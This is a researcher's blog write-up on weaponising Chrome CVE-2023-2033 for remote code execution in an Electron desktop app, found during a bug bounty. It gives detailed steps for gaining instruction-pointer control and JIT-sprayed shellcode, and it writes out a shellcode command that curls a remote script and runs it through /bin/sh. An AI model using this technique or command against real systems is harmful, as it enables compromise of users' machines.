Weaponizing Chrome CVE-2023-2033 for RCE in Electron: Some Assembly Required

Tue Mar 12 21:30:17 UTC 2024

Background

I discovered a React createElement based XSS bug in the core functionality of an application with a bug bounty program that had a desktop application. I'd found a couple of these types of bugs in this application before, and knew roughly what the expected payout would be. I wanted to turn the XSS vulnerability into a remote code execution vulnerability on the hosts of the desktop application users. The desktop application was running a version of Electron that used a Chrome version from roughly March 2023 and had Chrome sandboxing disabled in the main renderer window. I needed an RCE PoC to show impact. This is the story of how I got there. Heavy disclaimer, I had no prior browser exploitation experience before this and the process was a learning experience for me. There may be minor, and even major nuances I misunderstood or got wrong here, so take everything with this in mind.

Weaponized RCE PoCs for less than a year old Chrome vulnerabilities are not readily available online. Some of the type confusion bugs over the last year do have PoCs that go as far as to implement v8 heap read/write/addrof primitives. These public PoCs seem to all be built against d8, v8's developer shell. In practice, some of these weren't going to work on this targeted Chrome version, at least without extensive modifications, due to v8 running with very different flags when running under Chrome than a local d8 test run, and behaving very differently.

The target: Chrome/110.0.5481.192 Electron/23.2.0 on x86_64 Linux. For the purposes of this writeup, a very minimal Electron application was built using electron-forge to package a production build that ran an unsandboxed main renderer window and navigated to a local webserver that hosted a site with the exploit code.

CVE 2023-2033 ended up being the vulnerability that was chosen. A public PoC was readily available online with v8 heap read/write/addrof primitives that after some tinkering with, seemed to reliably work on the targeted Electron version. The following writeup is on weaponizing these primitives to achieve mostly stable and reliable RCE on amd64 Linux. The nature of how these primitives are implemented with the type confusion vulnerability is beyond the scope of this blog and can essentially function as a black box due to the wonderful work done in mistymntncop's PoC that implements them.

Exploit development was done locally against a running production Electron application, attaching GDB to the renderer process that ran the exploit code. A local d8 debug version was compiled and used for some small tests to better understand how JS objects are laid out in v8 memory, as well as how TurboFan compiled JIT code was intended to look, but it was not used for exploit development or testing, as it behaved differently than the production Electron application.

Getting the v8 heap primitives working

Mistymntncop's PoC was used as the starting place for this exploit. To use this as a base, it was required to get the v8 heap primitives implemented here working on the targeted version of Chrome.

First, all of the d8 native syntax needed to be removed from the PoC exploit primitives that this exploit was built off of, as it was targeting a production Chrome instance, and not a debug d8 instance, so these threw syntax errors. In this case, this just meant commenting out all of the %DebugPrint lines. It was also required to bulk replace calls to print() with calls to console.log(), as on the Chrome platform, these attempt to open a printing prompt instead of logging out text.

Getting the v8 heap read/write/addrof primitives from mistymntncop's PoC code to work on the target Chrome version was a little tricky. It was written and tested against a specific version of d8, and not written for Chrome. At first when an HTML document that included the exploit.js script was loaded, it was observed that the exploit failed to set up the primitives, and a JavaScript error appeared in the console.

Primitive errors

Following the old OffSec mantra of "Try Harder", these primitives were able to install properly by just running the pwn() function that set everything up four times. On the fourth run, instead of throwing an error, it usually successfully set up the primitives. The usage of them from the stock PoC example was observed to be working.

Working primitives

Code was added to the exploit that made a new pwn() call after a timeout of 0, 100, 200, and 300 milliseconds to attempt to install these primitives correctly.

V8 heap sandbox breakout theory

Having read/write/addrof primitives for the v8 heap was useful, but did not provide code execution for free. After reviewing a couple different writeups that interacted with this problem, it seemed the best bet was to force TurboFan (v8's top level JIT compiler) to optimize a function with Float64 Typed Array data in it, such that movabs instructions with 8 byte immediate arguments were generated for each long float in the array. These 8 byte immediate arguments contained 6 bytes of shellcode and a 2 byte jmp instruction to jump into the immediate value of the next movabs instruction. The v8 heap read/write/addrof primitives could be attempted to be used to tinker with the code addresses of functions to try to somehow get the instruction pointer to jump into the shellcode chunks.

The first writeup, Mem2019's writeup included a function with shellcode to make an execve syscall to execute /bin/sh. This and an additional function were added right before the pwn() calls.

Functions added

The foo function was called several times to cause TurboFan to compile and optimize the function, which was necessary to generate the movabs instructions with long 8 byte immediate arguments.

The shellcode that was assembled and encoded into Float64s was lifted from Mem2019's blog. This shellcode was generated with this Python script, also lifted from Mem2019.

Shellcode maker base

These 8 byte hex values were then converted to Float64s. The foo() function that returned the Float64s in an array was taken and was executed with GDB and d8. The TurboFan compiled optimized assembly code for the foo() function was inspected.

TurboFan generated asm

As expected, a series of movabs instructions with long 8 byte immediate values that contained the shellcode were created by the TurboFan compiled and optimized foo() function.

Playing with the primitives

Based on the research from Mem2019's writeup, the addrof primitive was used on both the foo() and f() functions to get a v8 heap pointer to the backing object. The read primitive was then used to read the JIT code address of the function 0x17 bytes from the start of the object pointer. To test this, code was added to the end of the pwn function that attempted to get the address of both the foo() and f() functions, and to read 8 bytes of memory 0x17 bytes after the start of each address.

F and foo addresses

The primitives appeared to be working, and it appeared possible to get the addresses of function objects and read memory from their address offset by a value. If these were actually the pointers the functions used to determine what code to run when a function executes, it was expected to be possible to make a write call to overwrite function f()'s JIT address with a pointer to function foo()'s, and upon calling f(), it was expected to instead see the result of calling foo(). The following code was added to the pwn() function:

F and foo swap

When this actually ran, and the primitives installed correctly, it was observed that the behavior of function f() was successfully changed to act as if it was function foo().

F and foo swap run

Seeking instruction pointer control

Mem2019's writeup suggested that by writing to this jitAddr offset from a function object and calling the function, the lower 32 bits of the instruction pointer could be controlled. To see what happened when this was attempted, instead of writing the jitAddr of function foo() to function f(), the value 0x4142434445464748 was written. The automatic calls to pwn() were removed, and it was manually called from Chrome DevTools after GDB was attached to the renderer process. If the instruction pointer could be controlled this way, it was expected to observe a segmentation fault with the lowest 32 bits of the instruction pointer matching the lowest 32 bits of the garbage test address.

Test crash

The crash that occured was inspected and it was observed that this was not actually the case. The crash occurred when attempting to read memory from $rcx+0x7, and the low 32 bits of $rcx matched the low 32 bits of the written jitAddr. After this read to $rcx, a jmp occurred that set the instruction pointer to $rcx. A couple instructions back, a familiar 0x17 offset from the value stored in $rdi being read into the low 32 bits of $rcx was visible. It was presumable that $rdi stored a pointer to the function object, and that this value read into the low bits of $rcx was the jitAddr. $r14 was then added to $rcx, presumably some offset that mapped v8 heap addresses to native heap addresses. If what was read from $rcx+0x7 to $rcx before the jump could be controlled, the instruction pointer could be controlled. To try to understand what normally resided there, another renderer crash was caught in GDB where instead of writing the fixed value, fooJitAddr | 0xF0000000 was written, where the highest bit was set, hoping to see another segmentation fault when attempting to read memory from $rcx+0x7. Based on previously read addresses, it was expected that this bit was normally 0.

Finding code addr

When this crash was captured, the segfault occurred in the same spot on the same memory read attempt. This time, however, it was possible to recover the intended original value of the foo function's JIT address by reading the low 32 bits stored at $rdi+0x17 and anding them with ~(0xFOOOOOOO). This gave back the original intended address. $r14 was added to it, and the memory address 0x7 off from that sum was read to get the intended value that without this tampering would have been read into $rcx before jumping to it. GDB inspect was used to observe the instructions at this address.

Function code instructions

Observing the instructions that would have been jumped to, the intended movabs instructions with 8 byte immediate values were present. Because of this, it was inferred that this was the TurboFan generated JIT compiled code for the foo() function. GDB was used to inspect the first 3 instructions parsed at 2 bytes into the first movabs instruction, and the first part of the shellcode was visible. Subtracting the intended start of the function from the entrance into the shellcode, it was calculated that if the function had been jumped into 0x7c bytes further than intended, the shellcode would have begun executing instead of the intended TurboFan generated code.

Seeing shellcode

Gaining instruction pointer control

Based on the previous testing, it was expected that a read of fooJitAddr+0x7 would return the pointer to the compiled TurboFan generated code. Upon actually testing this, it was observed that the address was quite similar to the one in last test. This address was a native heap address, not a v8 heap address, so the primitives could not be used to read and write shellcode at the location on the heap that was going to be jumped to. However, the address could be read, 0x7c could be added it it, and it could be overwritten with this sum. This would lead to this overwritten address getting loaded into $rcx by the previous instruction that was segfaulted on immediately before the jmp $rcx instruction. This would jump into executing the 8 byte immediate value in the first movabs instruction generated by TurboFan for the foo function with the Float64s containing the shellcode.

The pwn function was modified to do this, and it looked like the following:

Foo code ptr overwrite

When this was executed successfully in the vulnerable Electron version, the call to function foo() after the write lead to the TurboFan compiled code being jumped into 0x7c bytes further than intended, where the 8 byte chunks of shellcode started. The shellcode ran successfully, and execve with /bin/sh was called, leading to the following in Electron.

/bin/sh run

The renderer process was gone, as it had replaced itself with /bin/sh and exited. In the GDB session attached to the renderer before running the exploit, it was observed that /bin/sh was successfully executed. On the system used to write the exploit it happened to be a symlink to /usr/bin/dash.

gdb /bin/sh run

This was far enough to prove remote code execution was possible. This wasn't a useful proof of concept payload for a running Chrome renderer process that an attacker didn't have any ability to interact with the stdio of. It was desirable to write more useful shellcode that called /bin/sh with arguments that actually did something impactful.

Writing more useful shellcode

It was necessary to write more useful shellcode that showed ability to execute arbitrary scripts pulled from a remote server. To do this, shellcode was written that ran /bin/sh '$(/bin/curl www.turb0.one/files/s)'. The following shellcode was written that could reasonably do this, and had instructions that were all less than or equal to 6 bytes, so that they could fit in the 8 byte immediate movabs values and leave 2 bytes of room for the jmp at the end into the next 8 byte immediate value.

naiveshellcode

An int3 instruction was included at the beginning so that GDB would break on the shellcode start and the generation of the movabs instructions with 8 byte immediate values by TurboFan could be verified. These 8 byte hexadecimal numbers containing the shellcode were run through this likely overprecise online tool to convert the shellcode chunks to Float64 values for use in the foo() function. The foo() function now looked like the following:

naiveshellcode foo

Due to change in the amount of entries in the array, the TurboFan compiled code actually looked a bit different. The offset from the address of the compiled function that was jumped into had to be changed. The same trick to segfault with known addresses from earlier was used, and the offset was found to be 0x82. The previous pwn() function was updated to use this offset instead of 0x7c. With this change, the exploit was run with GDB attached to the renderer process, and the int3 breakpoint was hit.

naiveshellcode fail

The shellcode was reached, and execution was occurring within it. However, when execution was continued, a segfault occurred in the shellcode instead of /bin/sh being executed.

Troubleshooting longer shellcode

When attempting to work out where and why the segfault occurred, it was clear what had gone wrong with the shellcode. Some instructions before the instruction pointer were listed, and it was observed that the expected movabs instructions with 8 byte immediate values spaced 0x14 bytes apart were not always present.

Shellcode broken assumptions

It appeared that TurboFan had generated code for the foo() function that had optimized the loading of some of the repeated values in the Float64 array that the shellcode lived in. This should have been expected, as TurboFan is v8's top level JIT compiler, and is meant to generate the most optimized JIT code. This meant that if longer shellcode payloads were to be written by this method, it would be necessary to make sure the shellcode didn't repeat itself, so TurboFan wouldn't able to perform these optimizations instead of generating the desired movabs instructions with 8 byte immediate values.

Writing an anti optimizing shellcode generator

It was necessary to modify the shellcode generating python script to write "anti optimization" shellcode so that TurboFan wouldn't be able to optimize out any of the desired movabs instructions that contained the shellcode. In its original state, when an encoded instruction didn't fill the entire 6 bytes of space before the jmp instruction into the next piece of shellcode, the extra bytes in between were filled with nop instructions. This meant that the same Float64 would be generated for the same <= 6 byte chunk of shellcode, which would allow for the optimization behavior from TurboFan to occur that needed to be avoided. Instead, these instructions could be encoded so that the jmp came immediately after the instructions, with the jmp distance modified to reflect that it no longer came at the end, and the rest of the 8 bytes could be filled with procedurally generated junk bytes that instead of getting executed like the nops just got jumped past. This would prevent the Float64 values generated from each chunk of shellcode from being the same for chunks of shellcode less than 6 bytes. The only repeating chunks of shellcode in the longer shellcode that had been written all had room for these additional garbage anti optimizing bytes. The shellcode generator script was modified to implement this, and ended up with functionality that looked like the following:

Better shellcode generator

The script was rerun, the output was run through a Float64 converter to get the floats to replace the content of the array that foo() returned. After attaching GDB and rerunning the exploit with this new payload, the int3 breakpoint was hit again. Upon continuing, instead of the exploit running successfully and /bin/sh executing with the desired arguments, the program instead segfaulted again. Inspecting instructions leading up to the instruction pointer, it was clear that the crash had occurred in the shellcode section, and that the instructions appeared correct. This meant that the optimizing behavior of TurboFan was successfully mitigated. The instructions appeared to be the same, but the distance between the movabs instructions had changed.

Gap size change

The size of the movsd instruction was observed to have changed because it needed to take a larger argument. The generated instructions were reviewed, and it was determined that the assumption of the gap between movabs instructions being 0x14 only held for the first 15. After that, due to larger sizes being needed for the instructions between the movabs instruction, the gap became 0x17. A counter was added to the shellcode generator to account for this in the jmp instructions into the next chunk of shellcode. The segfault occurred because the shellcode didn't jump far enough from the last instruction, and should have instead jumped 3 bytes further. The generator was updated to account for this, and the python looked like the following:

Final shellcode generator

Achieving stager shellcode execution

The new and improved shellcode generator that was enhanced to generate anti optimizing code to ensure TurboFan always generated a movabs instruction for each chunk of shellcode, and supported the longer jumps between movabs immediate values later into the TurboFan compiled code had the int3 at the start of its shellcode removed. A final payload was regenerated and reencoded. The staged payload at www.turb0.one/files/s just had the content /bin/touch /tmp/rcepoc. The exploit was rerun with the final payload. Chrome DevTools reported that the renderer process was gone, suggesting the shellcode had reached the execve syscall successfully. ls /tmp was run, and it was observed that a /tmp/rcepoc file had been created, showing that the shellcode had run successfully.

RCE PoC file written

This showed that the second stage script had successfully been pulled from the web server and executed. A working exploit had successfully been created that practically performed remote code execution in the target Electron version by leveraging v8 heap primitives written for CVE-2023-2033 by mistymtncop with techniques inspired by and adapted from Mem2019's research.

Wrapping things up and fully weaponizing

The calls to pwn() to automatically attempt to run the exploit when the page loads were uncommented. The primitives didn't set up properly every time, and sometimes they crashed instead of working properly. The failure chance on the test machine felt to be about 10% of the time. To attempt to mitigate this, a file, exploitloader.html, was created that iframed 5 instances of exploit.html, which loaded the actual exploit.js that had the exploit code. This was designed to lead to more consistent execution of the RCE PoC payload.

Final versions of files mentioned in this writeup can be found here:

RCE exploit demonstration page
RCE exploit JavaScript
Exploit shellcode generator script

Conclusion

This writeup covers parts of the research process I went through to weaponize CVE-2023-2033 for RCE with a lot of long dead ends cut out. Some conclusions in this writeup were drawn more quickly and understandings reached more directly than they occurred in practice. I went into this with no past browser exploitation experience or knowledge, and left with some functional understanding of some browser exploitation related topics. I was able to get a working full chain PoC put together and a report in for the application I was targeting, and the report was remediated. In the process, I was able to learn tricks for going from v8 primitives to shellcode execution, work out how to get instruction pointer control on the version of Chrome I had to target, and build a script to create anti TurboFan optimization shellcode.

Bits, bytes, and bad ideas